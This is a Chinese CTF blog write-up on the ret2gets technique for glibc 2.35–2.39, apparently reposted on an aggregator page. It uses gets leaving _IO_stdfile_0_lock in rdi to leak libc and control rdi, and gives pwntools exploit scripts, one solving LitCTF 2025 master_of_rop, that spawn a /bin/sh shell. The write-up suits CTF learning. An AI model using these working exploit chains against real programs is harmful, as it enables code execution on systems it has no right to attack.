当前位置：首页 > article >正文

Ret2gets

article 2026/4/26 1:58:56

[原创]ret2gets的原理与利用方法-Pwn-看雪安全社区专业技术交流与安全研究论坛可以看一下这位师傅写的ret2gets的原理。还是十分详细的。由于在高版本的glibc中删除了__libc_csu_init这个函数。所以导致我们在不清楚libc基地址的情况下很难找到pop rdi这样的gadget来为我们传递一参。正常的ret2libc就基本上利用不了了。在glibc2.35~2.37版本中我们可以来看一下这里的ret2gets是怎么利用的。可以先写一个比较简单的demo。版本是glibc2.35的。#include stdio.h int main() { char buf[0x20]; puts(Can you rop?\n); gets(buf); return 0; }很显然这里不存在pop rdi这种方便的一参。那我们应该怎么办呢可以先运行下程序看看做了什么。from pwn import * context.log_level debug context.arch amd64 io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) io.interactive()这是我们的测试脚本。可以看到断点打在了发送内容之前。可以看到我们的rdi里存放的是_IO_stdfile_0_lock存放的是libc内的内容。这就为我们泄露libc基地址提供帮助了。首先先看下结构体。typedef struct { int lock; int cnt; void *owner; } _IO_lock_t;我们这里需要利用到里面的两个宏。可以看下源码。glibc2.37#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (--(_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ } while (0)我们可以看到在_IO_lock_unlock里存在对cnt会进行--并判断--后的值是否0。如果等于0那么owner处的值就会被置零。但是owner处是存放着TLS地址的。只要能puts出来我们就拿到了libc基地址了。所以就是说我们输入的第五个字节会被减减。同时要注意puts会有\x00截断所以在owner之前不能存在\x00字节存在。我们可以来看一下如何在没有pop rdi的情况下控制一参。from pwn import * context.log_level debug context.arch amd64 io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) io.interactive()可以看到通过减一后我们输入的内容刚好就是/bin/sh了。同时这里还实现了对于一参rdi的控制。但是我们这里没有调用system啊光光控制一参有什么用呢所以我们的首要目的是去获得libc的基地址。也就是要去绕过_IO_lock_unlock的检测。from pwn import * context.log_level debug context.arch amd64 io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets) p64(elf.plt.puts) p64(elf.sym.main) io.sendline(pl1) gdb.attach(io) io.sendline(bA*4b\x00*3) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3b8740 success(hex(base)) rdi base 0x2a3e5 binsh base next(libc.search(/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(baselibc.sym.system) io.sendline(pl2) io.interactive()这里关键在于bA*4b\x00*3。由于gets会把末尾的\n换成\x00所以我们输入后会变成lock被写入为AAAAcnt被写入为\x00*4。当cnt自减时就会变为一个大数\xff\xff\xff\xff。这样就成功绕过了检测得到了libc基地址。pwndbg tele 0x7ffff7e1ca80 00:0000│ rax rdi 0x7ffff7e1ca80 ◂— 0xffffffff41414141 01:0008│ 0x7ffff7e1ca88 —▸ 0x7ffff7fb8740 ◂— 0x7ffff7fb8740 02:0010│ 0x7ffff7e1ca90 ◂— 0 ... ↓ 5 skipped在得到libc基地址后后面去获得各种gadget就简单多了。上面的实现都基于glibc2.35-2.37版本。在glibc2.37~2.39版本中又对lock增加了检测。还是先看源码。#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if (SINGLE_THREAD_P (_name).owner NULL) \ { \ (_name).lock LLL_LOCK_INITIALIZER_LOCKED; \ (_name).owner __self; \ } \ else if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ else \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (SINGLE_THREAD_P (_name).cnt 0) \ { \ (_name).owner NULL; \ (_name).lock 0; \ } \ else if ((_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ else \ --(_name).cnt; \ } while (0)发现这里只有当cnt!0的时候才可以让cnt--。结合nssctf里的一道题来说明。[LitCTF 2025]master_of_rop链接[LitCTF 2025]master_of_rop - NSSCTF__int64 __fastcall main(int a1, char **a2, char **a3) { _BYTE v4[32]; // [rsp0h] [rbp-20h] BYREF puts(Welcome to LitCTF2025!); gets(v4, a2); return 0LL; }依旧一眼栈溢出。下面给出exp。from pwn import * context.log_level debug #io remote(node4.anna.nssctf.cn,28428) io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets)*2 p64(elf.plt.puts) p64(0x4011ad) io.sendline(pl1) io.sendline(p32(0)ba*4ba*8) io.sendline(ba*4) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3ba740#远端换成0x28c0 success(hex(base)) rdi base 0x10f75b binsh base next(libc.search(b/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(rdi1) p64(baselibc.sym.system) #gdb.attach(io) io.sendline(pl2) io.interactive()这里解释一下。这里去使用了两次gets两次往_IO_stdfile_0_lock_里写入内容。第一次先去覆盖cnt的值然后把lock置零防止stdin上死锁卡死进程最后发现好像不管写入什么都会把lock置零然后就是第二次写入把lock再给覆盖然后就可以正常打rop了。这里把lock去置零然后后面会发生抢锁的过程然后会更新owner。好像只要owner地址合法就不会考虑lock的值了也要先咕咕咕了。这种题型比较死板基本照着写就行QAQ。问题是这里远端我调了好久也不知道为什么一直和远端有问题。先咕咕咕吧......

Ret2gets

相关文章：

Ret2gets

2026年Hermes Agent/OpenClaw如何安装？1分钟云端保姆级安装及百炼Coding Plan指南

Go语言如何判断字符串包含_Go语言strings.Contains教程【精通】

Dictionary查找指定的Valuem,判断是否有值

Python多进程编程实战：提升计算效率的关键技术

递归语言模型：原理、实现与应用场景解析

贝叶斯定理：从直觉理解到实战应用

Amazon ECS Agent 深度解析：架构、部署与生产环境实战指南

Illustrator脚本终极指南：25+免费工具彻底改变你的设计工作流

抖音下载器终极指南：三步实现免费批量下载与直播回放保存

高考历年真题试卷电子版，全国卷+34省地方卷，包含数学英语语文生物化学等9科

多智能体协作框架：从原理到实践，构建高效AI工作流

【微软Build 2026提前剧透】VSCode多智能体任务分配架构图首度公开：含3层决策流、2级缓存机制与SLA保障协议

深度解析：Ryujinx模拟器的5个颠覆性设计哲学与架构创新

sklearn【MAPE】实战避坑指南：从原理到代码的完整解析

图像缩放方法在计算机视觉中的优化与应用

MAA助手：明日方舟终极自动化解决方案的技术架构与实践指南

基于CAVM架构的金融研究智能体系统FinSight实战指南

2026届必备的六大降重复率平台解析与推荐

LSGAN原理与Keras实现：提升生成对抗网络训练稳定性

[特殊字符]基于Vue与Django构建的高性能电商网站系统（含完整源码+部署指南）

InfoGAN原理与Keras实现：可控生成对抗网络详解

MIUI自动化任务脚本：3个核心技巧解决小米社区重复性工作

落地台灯怎么选？内行才知道的挑选技巧，家长必看避坑干货

投稿踩坑3个月，被拒两次才发现：一开始的选刊方向就错了

Cursor + Claude Code 接入 API 实战：国内稳定使用 Claude 4.7 配置全攻略

Claude Scientific Skills：134个技能打造桌面AI科学家，加速科研工作流

【AI Agent实战】公众号排版丑？AI帮你一键改造成「课堂型」高级感

基于大语言模型的代码仓库智能文档生成：RepoAgent实战指南

C语言刷题日记 #6